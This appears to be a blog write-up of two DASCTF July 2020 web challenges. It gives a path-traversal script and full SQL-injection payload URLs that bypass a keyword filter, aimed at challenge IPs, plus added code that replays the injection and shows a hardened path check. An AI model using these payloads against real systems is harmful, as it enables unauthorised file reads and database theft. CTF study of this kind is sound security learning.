DASCTF July

2020-07-26 01:07:00
wp - dasctf

Haven't posted in a while, so here's a quick one.

web1

The prefix is fixed and ../ is filtered, but the filter only strips a ../ at the very start of the string, so a dummy leading directory (hhhm/../...) walks straight past it. Not sure what the point of setting the challenge this way is.

import time
import requests
import base64

# Traversal payload: the leading dummy directory "hhhm/" defeats a filter
# that only strips "../" at the start of the string; the rest of the
# path climbs to the filesystem root and reads /flag.
file = "hhhm/../../../../../../../../flag"
file = base64.b64encode(file.encode())  # image.php expects f base64-encoded
url = "http://183.129.189.60:10009/image.php?t={0}&f={1}"
now = int(time.time())  # t is a current timestamp
rep = requests.get(url.format(str(now), file.decode()))
print(rep.text)
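To show why the bypass works and what the filter should have done instead, here is an added example (not code from the writeup or the challenge): a lexical model of the "strip a leading ../" filter beside a containment check that normalises first and then verifies the result stays under the base directory. The base directory /var/www/html/images is an assumption, as is the exact form of the challenge's filter; the writeup only says that a leading ../ is removed.

```python
import posixpath
import re

# Assumed document root for image.php; the writeup does not give the real path.
BASE_DIR = "/var/www/html/images"


def naive_filter(user_path: str) -> str:
    """Filter as the writeup describes it: only a leading run of '../' is stripped."""
    return re.sub(r"^(\.\./)+", "", user_path)


def resolve(base: str, user_path: str) -> str:
    """Join and normalise lexically (posixpath, so this runs without a filesystem)."""
    return posixpath.normpath(posixpath.join(base, user_path))


def escapes_base(base: str, user_path: str) -> bool:
    """True when the normalised path lands outside base."""
    full = resolve(base, user_path)
    return full != base and not full.startswith(base.rstrip("/") + "/")


def naive_open_path(user_path: str) -> str:
    """What the challenge effectively does: strip the prefix, then trust the result."""
    return resolve(BASE_DIR, naive_filter(user_path))


def is_allowed(user_path: str) -> bool:
    """Hardened check: normalise, then enforce containment under BASE_DIR.

    In real code, repeat the check on os.path.realpath() of the final path,
    so a symlink inside the base cannot point back out of it.
    """
    return not escapes_base(BASE_DIR, user_path)


def hardened_open_path(user_path: str) -> str:
    """Refuse anything that escapes the base instead of trying to sanitise it."""
    if not is_allowed(user_path):
        raise ValueError(f"path traversal rejected: {user_path!r}")
    return resolve(BASE_DIR, user_path)


if __name__ == "__main__":
    payload = "hhhm/../../../../../../../../flag"
    print("naive filter leaves payload as:", naive_filter(payload))
    print("naive resolution opens:", naive_open_path(payload))  # /flag
    print("hardened allows payload?", is_allowed(payload))      # False
    print("hardened allows hhhm/../cat.png?", is_allowed("hhhm/../cat.png"))  # True
```

The containment check deliberately accepts hhhm/../cat.png: a ../ that stays inside the base is harmless, and rejecting on the substring alone would be the same category of mistake as stripping it.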

web2

Much the same as SWPU2019 Web1.

The filter regex is given in the source:

return preg_match("/;|benchmark|\^|if|[\s]|in|case|when|sleep|auto|desc|stat|\||lock|or|and|&|like|-|`/i", $id);

Whitespace is bypassed with /**/.

Union-based injection runs into the fact that information_schema is blocked (the regex matches the in and or inside it). Two views in the sys schema also expose table names and can stand in for it:

  • sys.x$schema_flattened_keys
  • sys.schema_table_statistics_with_buffer

Note that the second one still trips this particular regex, because statistics contains stat, so only the first is usable here.

Using the first one, dump the table names:

http://183.129.189.60:10004/?id=0%27/**/union/**/select/**/1,2,group_concat(table_name)from/**/sys.x$schema_flattened_keys/**/where/**/table_schema=database()%23

Array ( [0] => 1 [id] => 1 [1] => 2 [username] => 2 [2] => flllaaaggg,users [password] => flllaaaggg,users )

Dump flllaaaggg directly. Its column names are unknown, so use columnless injection: the first SELECT of the inner union names the columns a and b, the rows of the flag table inherit those names, and the derived table x then lets the flag table's second column be read as b:

http://183.129.189.60:10004/?id=0%27/**/union/**/select/**/1,2,(select/**/group_concat(b)/**/from(select/**/1/**/as/**/a,2/**/as/**/b/**/union/**/select*from/**/flllaaaggg)x)%23
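As an added example (not part of the writeup), the following Python ports the challenge's regex one-to-one so payloads can be vetted locally before they are sent, and replays the columnless-injection trick against an in-memory SQLite database with a constructed two-column flag table. Both payloads are the writeup's own, URL-decoded; the only change for the SQLite replay is the tail, because SQLite has no # comment, so the trailing quote of the vulnerable query is absorbed with where '1'='1 instead. The users/flllaaaggg schema, the row contents and the vulnerable query template are all constructed for this example.

```python
import re
import sqlite3

# The challenge's PHP preg_match pattern, ported one-to-one (the /i flag
# becomes re.IGNORECASE; the regex body is unchanged).
FILTER = re.compile(
    r";|benchmark|\^|if|[\s]|in|case|when|sleep|auto|desc|stat|\||lock|or|and|&|like|-|`",
    re.IGNORECASE,
)


def blocked(payload: str) -> bool:
    """True if the challenge's filter would reject this value of id."""
    return FILTER.search(payload) is not None


# The writeup's two payloads, URL-decoded (%27 -> ', %23 -> #).
TABLE_NAMES_PAYLOAD = (
    "0'/**/union/**/select/**/1,2,group_concat(table_name)from/**/"
    "sys.x$schema_flattened_keys/**/where/**/table_schema=database()#"
)
COLUMNLESS_PAYLOAD = (
    "0'/**/union/**/select/**/1,2,(select/**/group_concat(b)/**/from"
    "(select/**/1/**/as/**/a,2/**/as/**/b/**/union/**/select*from/**/flllaaaggg)x)#"
)
# Same trick with a SQLite-compatible tail: drop the '#' and close the quote
# that the vulnerable query appends with a tautology instead.
COLUMNLESS_PAYLOAD_SQLITE = COLUMNLESS_PAYLOAD[:-1] + "/**/where/**/'1'='1"


def columnless_dump(payload: str = COLUMNLESS_PAYLOAD_SQLITE) -> str:
    """Replay the injection against a constructed schema and return the
    injected group_concat value, i.e. the flag table's second column."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES (1, 'admin', 'constructed-password')")
    # The attacker never learns these column names; only the count (2)
    # matters, because the union's first SELECT supplies the names a and b.
    con.execute("CREATE TABLE flllaaaggg (k INTEGER, v TEXT)")
    con.execute("INSERT INTO flllaaaggg VALUES (1, 'DASCTF{constructed_flag}')")
    # The vulnerable pattern: id concatenated straight into the statement.
    sql = f"SELECT id, username, password FROM users WHERE id='{payload}'"
    rows = con.execute(sql).fetchall()
    # The injected row is (1, 2, <group_concat>); no users row has id 0.
    injected = [r for r in rows if r[0] == 1 and r[1] == 2]
    return injected[0][2] if injected else ""


if __name__ == "__main__":
    for name in ("information_schema", "sys.x$schema_flattened_keys",
                 "sys.schema_table_statistics_with_buffer"):
        print(f"{name}: {'blocked' if blocked(name) else 'passes'}")
    print("table-names payload passes:", not blocked(TABLE_NAMES_PAYLOAD))
    print("columnless payload passes:", not blocked(COLUMNLESS_PAYLOAD_SQLITE))
    print("dumped:", columnless_dump())
```

Running blocked() over candidate table names is the quickest way to see why the first sys view was chosen: information_schema dies on in, schema_table_statistics_with_buffer dies on stat, and x$schema_flattened_keys contains none of the listed tokens.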


Originally published on HhhM's blog; please credit the source when reposting.



CopyRight © 2019 HhhM